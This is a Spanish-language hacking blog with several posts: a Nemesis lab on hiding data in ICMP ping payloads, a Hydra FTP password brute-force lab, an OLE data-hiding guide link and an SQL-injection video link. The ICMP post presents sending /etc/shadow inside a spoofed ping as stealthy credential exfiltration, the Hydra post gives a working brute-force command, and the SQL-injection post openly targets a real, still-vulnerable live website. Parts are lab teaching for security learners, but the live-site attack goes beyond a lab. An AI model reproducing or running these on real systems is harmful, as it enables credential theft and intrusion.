Banner 1

Mostrando entradas con la etiqueta bad_robot. Mostrar todas las entradas
Mostrando entradas con la etiqueta bad_robot. Mostrar todas las entradas

La nueva comunidad blackproyect.com

0 comentarios
Buenos dias.

Hoy quiero anunciarles la apertura de la comunidad "blackproyect.com", en la cual participare esperando ser activo.
Se han iniciado varios proyectos muy buenos con lo cual buscamos ser una comunidad unica a su estilo de trabajo, cualquier persona es libre de participar asi que esperamos que se animen a ser parte de ella.

Cualquier duda , propuestas y reclamos seran escuchadas en el foro.

Saludos roboticos

Objetos OLE

0 comentarios
Ya existe una entrada relacionada con el tema pero en esta explicare que son y como pueden realizar este "ataque" manualmente.

Este documento lo escribi para wow.sinfocol.org como ayuda educativa para el wargame asi que les recomiendo que se den la pasadita y se entretengan un rato.

---------------------------------------------------------------------------------------------------

Basicamente doy una introduccion de que son los objetos OLE y como trabajarlos, en este caso doy un ejemplo practico con el programa mergestreams.
Tambien busco dar una vision de como detectar esta tecnica y como estamos actualmente frente a una situacion de fuga de informacion.

Aqui dejo el link http://www.mediafire.com/?mmjm1i4xjoj de descarga

Formato PDF

Mirror:

http://www.phyrexianarena.com/wow/viewtopic.php?f=87&t=78

saludos roboticos

conociendo a NEMESIS 1/3 [creacion de paquetes icmp]hackiando con bad_robot

2 comentarios
* Titulo del Laboratorio

Creacion de paquetes icmp por medio de nemesis

* Objetivos

Conocer el funcionamiento del protocolo tcp/ip y sus debilidades
Conocer  el funcionamiento de un paquete icmp y explotarlo

* Elementos de hardware necesarios

2 PC
Cableado mas router o modem , en el peor de los casos un hub xD

* Elementos de Software necesarios

Linux o windows
Nemesis
Sniffer

* Otros elementos necesarios

Conocimientos basicos sobre paquetes icmp
Conocimiento sobre analisis de paquetes en red
Ganas de aprender y de no causar dan'o


Resumen

La idea es empezar a conocer la herramienta nemesis, por esto dividire el tema en tres post diferentes , utilizando el nemesis en varios sentidos (protocolos diferentes) , por obvia razones no alcanzariamos a estudiarlo a fondo totalmente ya que nemesis es muy extenso por eso queda en ustedes la profundizacion de la herramienta(muy recomendado).

Bueno ahora si hablemos del post de hoy , la idea es crear un paquete icmp o como todos lo conocemos "ping"; pero esto no tendria ninguna utilidad con solo crearlo es por eso que hoy veremos como aprovechar esa creacion de este tipo de paquetes.

Hoy vamos a usar la vulnerabilidad del mismo paquete para enviar informacion por la red, dividire el tema en 2: estenografia en red y hacking en red.

!. Estenografia en red:

Basicamente lo que tratamos es "ocultar" datos en la red, en su totalidad nunca van a estar ocultos ya esto depende es de la audacia del administrador.
Es muy comun que un administrador de red este revisando todo tipo de paquete , pero casi nunca revisan un paquete icmp porque? porque contiene "informacion no valiosa" pues hoy vamos a cambiar esa idea.

A.Lo primero que vamos hacer es mirar la sintaxis de nemesis



Podemos observar todos los modos que soporta nemesis, hoy vamos a usar el icmp

B. Ahora vamos a crear un texto para enviar por la red, esto lo hacemos lo mas facil posible por medio de echo

Código:
echo hacked by bad_robot > hacked.txt



C.Ejecutamos el sniffer en mi caso wireshark y le damos click en interfaces



D. En mi caso voy a realizar la prueba localmente , por eso utilizare la interfaz lo




E.Ahora creamos nuestro paquete icmp el cual vamos a mandar a la direccion local osea lo, utilizaremos el campo vulnerable de este protocolo osea payload , aqui enviaremos el documento que creamos al principio, la sintaxis es la siguiente:

Código:
nemesis icmp -P haked.txt -D 127.0.0.1



Explicacion:

nemesis icmp: es el modo
   
-P haked.txt : con -P especificamos que vamos a usar ese campo del paquete y lo creamos a nuestro antojo , en nuestro caso queremos que lo rellene con la informacion dentro del documento

-D 127.0.0.1 : con -D especificamos la direccion ip destino y utilizamoos la direccion lo.

NOTA: No hemos especificado la direccion ip origen, esto no es recomendado en un "ataque" a nivel de red local ya que el router puede que no resuelva el paquete porque la ip no proviene de su red.

F. Injecctamos el paquete y nos debe aparecer paquete injecctado



Podemos observar como nuestro sniffer detecta el trafico del paquete y lo captura

G.Miramos los datos capturados por el sniffer y observamos que nuestro mensage fue enviado exitosamente.



Bueno hasta aqui hemos aprendido a enviar mensages a nivel de red, ya sea estenograficos o algo geek , depende de el uso que le demos.

2. Hacking en red

Bueno ahora vamos a hacer algo mas malicioso y aprovechemos del todo esta vulnerabilidad, porque no mandar por red algo importante? pues bien hagamoslo.

Supongamos que tenemos acceso a un pc en la red y mejor aun al servidor y queremos mandar datos importantes para luego tener acceso remotamente , como hacemos esto sin que nadie se de cuenta? claro con un "ping", pero se preguntaran que datos pueden ser importantes y descubren "que tal si tenemos los users y pass de los usuarios de la maquina para luego conectarme remotamente", despues de llegar a esta conclusion vamos a poner a practicar nuestro cerebro.
Este metodo sirve tanto para windows como linux , en mi caso use linux ya que la mayoria de servidores estan montados en este s.o (no soy racista de s.o).

Ahora si vamos a la accion , la sintaxis seria la siguiente

Código:
nemesis icmp -P /etc/shadow -D 127.0.0.1



Conclusiones:

Al no especificar direccion ip origen el nemesis genera su propia direccion ip origen(ip spoofing), se puede analisar mirando los dos paquetes injectados, esto tambien es muy usado para un ataque DOS.
   
Las vulnerabilidades de estos protocolos son muy graves porque no existe proteccion alguna o digamos no hay parches para los niveles inferiores de la capa OSI por eso debemos contar con administradores bien preparados para algun tipo de ataque como el hoy visto.

Bueno ya queda de su parte profundizar mas sobre el tema.

saludos roboticos Wink

entrando por ftp gracias a hydra[hackiando con bad_robot]

0 comentarios
bueno este lab lo hize para mis dos comunidades y sobre todo los lectores del blog , consta de el montaje de un servidor ftp y como atacarlo obviamente es igual en la vida real. El laboratorio es sencillo porque ya contabamos con el usuario ya les toca a ustedes investigar como hacer un ataque tambien por usuario(no es complicado).

* Titulo del Laboratorio

montando y atacando un servidor ftp con hydra

* Objetivos

Dar concentimiento de la seguridad en estas conexiones
Conocer como mas podemos explotar y que programas utilizar para llevar nuestro ataque
Metodos preventivos y correctivos contra estos ataques

* Elementos de hardware necesarios

1 pc atacante
1 Servidor
1 conx conectarnos a inet y mirar el cut

* Elementos de Software necesarios

navegador o cliente ftp (en mi caso con la consola basta)
hydra instalado

* Otros elementos necesarios

Conocimientos basicos sobre ftp , cuentas y permisos
Ganas de aprender y de no causar dan'o


Resumen

Con este laboratorio se busca conocer como explotar una conexion ftp con hydra , pero a su vez animarlos a investigar mas sobre el tema y mirar nuevas formas de ataques y tambien que otros programas mas eficientes podemos usar.
Tambien es una forma de montar un servidor ftp basico asi que espero que les guste y se animen a investigar.

1.Instalamos un servidor ftp ya sea en una maquina en nuestra red o en nuestro equipo(tambien es valido con cualquier servidor ftp en internet)

Vamos a usar vsftpd (Very Secure FTP) como servidor ftp:

en ubuntu lo podemos instalar desde repositorios
Code:
Código:
apt-get install vsftpd
NOTA: ya estaba logeado como root desde gdm(muy inseguro realizarlo), normalmente se antepondra sudo para poderlo instalar si tenemos cuenta normal.

Tambien si queremos probar nuestro servidor escribimos en consola

Code:
Código:
ftp localhost
y nos logeamos como anonimos
Code:
Código:
anonymous
y pass vacia

Ahora vamos a realizarle algunos cambios a la configuracion por defecto:

Para realizar cambios vamos a editar el archivo de configuracion

Code:
Código:
gedit /etc/vsftpd.conf

Cambiamos la línea anonymous_enable=YES por anonymous_enable=NO para así evitar que puedan entrar usuarios anónimos. (Si queremos)
Ahora les explicare el porque quitar el # de las líneas:

Code:
#write_enable=YES

#local_enable=YES

#local_umask=022
write_enable=YES nos permite poder acceder en modo escritura, si al usuario que se conecta le damos los permisos correspondientes, claro.

local_enable=YES activa la opción de permitir que se conecten a nuestro servidor de ftp mediante usuarios propios del sistema.

local_umask=022 establece los permisos del archivo que el usuario suba a nuestro servidor a 755 (permiso total al propietario y lectura/ejecución a los demás usuarios).

NOTA: despues de hacer estos cambios debemos reiniciar el servicio
Code:
Código:
/etc/init.d/vsftpd restart
Listo ahora podemos probar con nuestros usuarios en la maquina, en mi caso el usuario jony



Bueno hasta aqui tenemos nuestro servidor ftp funcionando a la perfeccion con usuarios del sistema, hasta aqui vamos a trabajar servidor ftp si quieren pueden profundizar mas en el tema.

2. Instalamos hydra

Primero que todo instalamos las dependencias que necesita el hydra para funcionar

Code:
Código:
apt-get install libssl-dev libgtk2.0-dev
Ahora bajamos el paquete(hydra)

Ahora copiamos hydra a mi carpeta personal pero si quieren lo extraen en el mismo directorio y lo ejecutan de ahi mismo

Code:
Código:
mkdir ~/bin
tar -xvzf hydra-5.4-src.tar.gz -C ~/bin
cd ~/bin/hydra-5.4-src
Lo compilamos:

Code:
Código:
./configure
Y

realizamos el Makefile:
Code:
    Código:
make
Ahora ya tenemos hydra funcionando al 100%

3. atacando con hydra

Primero que todo debemos mirar la sintaxis , yo les explicare lo basico

-l especifica el login de usuario
-P especifica el wordlist
-V especificamos el servidor que vamos a atacar
y el tipo de servicio (ftp , imap , http-basic)

NOTA: el wordlist lo pueden bajar de la direccion de la bibliografia o tambien pueden buscar de sus preferencias o crearlo a su gusto, tambien hydra no solo sirve para ftp , esto es solo para darles una pequen'a introduccion

Ahora si ejecutamos hydra y al ataque:

Para ejecutarlo escribimos
Code:
Código:
./hydra

ahora vamos a atacar nuestro servidor local de la siguiente forma

Code:
Código:
./hydra -l jony -P password.lst -V localhost ftp

Donde:
-l es un usuario conocido
-P es el wordlist para atacar
-V el servidor que vamos a tacar
ftp es el tipo de servicio



Aqui nos muestra el resultado donde nos dice que el pass es jony

Bueno ahora es de ustedes profundizar en el tema, que pueden buscar?

1. ataques a fuerza bruta
2. ataques distribuidos
3. protocolos que soporta hydra

y una infinidad de temas que les pueden servir para su comienzo en la seguridad informatica o "hacking"

Bueno Hasta aqui por hoy y espero practiquen

NOTA: no me hago responsable del contenido aqui presente , no se busca generar actos delictivos con ellos , es solo de uso personal

Fuentes:
http://lonetcamp.com/Community/blogs...gnu-linux.aspx --montando un servidor ftp

ftp://ftp.openwall.com/pub/wordlists/ ---descarga del worlist

http://tuxtraining.com/2009/02/13/ho...-intrepid-ibex --Instalacion de hydra en ubuntu

http://foro.latinohack.com/showthread.php?t=16240 --Mirror del laboratorio en LH

http://foro.colombiaunderground.org/index.php/topic,5013.0.html --Mirror del laboratorio en el CUT


Espero les guste el lab

Proximamente nemesis

saludos roboticos

Sql injeccion videotutorial [hackiando con bad_robot]

2 comentarios
Bueno hoy quiero compartirles un video tutorial que hize hace poco para pasar un reto de yashira, de no ser asi no hubiera hecho nada xD.

NOTA: no me hago responsable del mal uso , cumplo con compartir conocimiento y sobre todo dar a entender lo importante que es la seguridad a nivel web y no solo presencial.

Soy el autor del video 100% derecho de autor por eso si no son fanaticos de la informatica y no se controlan al ver una vulnerabilidad sino que siempre quiere hacer dan'o y dar una mala imagen porfavor no mirar esto. Este video tutorial es solo de fines educativos sin ningun tipo de dan'o a los demas.

* Objetivos

Dar a conocer la importancia de llevar una implementacion de seguridad en todos los aplicativos desarrollados , de igual forma concientizar a los desarrolladores , programadores e administradores de que la informacion y sobre todo la disponibilidad son un factor importante en la vida diaria.

Mostrar la facilidad de un ataque sql injeccion

Concientizar de ayudar a los adminsitradores a crear un mundo mas seguro

* Elementos de hardware necesarios

1 pc atacante en mi caso digamos un pc para pentest externo xD y gratis....
1 cable modem para conectarnos a inet y mirar el cut


* Elementos de Software necesarios

navegador

* Otros elementos necesarios

Conocimientos basicos sobre sql
Ganas de aprender y de no causar dan'o


Resumen

Hoy vamos a a aprender paso a paso como realizar una injeccion sql en paginas reales(que tengan la vulnerabilidad vigente) , la idea no es crear delincuentes ni mucho menos , es concientizar de la seguridad en aplicativos web y el de no causar dan'os a terceros.

Porfavor si no eres una persona consiente en el dan'o ageno no bajar ni mirar el video, tambien me gustaria que hizieran el post privado para que ningun o derivados lo usen de mala forma

Link de descarga:

Formato: avi
Idioma: espan'ol
Proteccion: ninguna(solo derechos de autor)
server:mediafire

http://www.mediafire.com/download.php?5y1mlzwmzm5

NOTA: NO ME HAGO RESPONSABLE DEL MAL USO DEL VIDEO.

PD:

1.Es una pag real no hacer experimentos

2.Es mi primer video tutorial , comprender errores y derivados xD

3. Para los que no les gusta la copia xD

Reactivado el link del video pero les pido que cuando hagan esto en este o en otros servers lo hagan solo por conocimiento y ganas de aprender , no por buscar hacer dan'o o tener fama.

Espero cumplan con los requisitos

saludos roboticos y si cumplen posteare mas
Powered by Bad Robot
Helped by Blackubay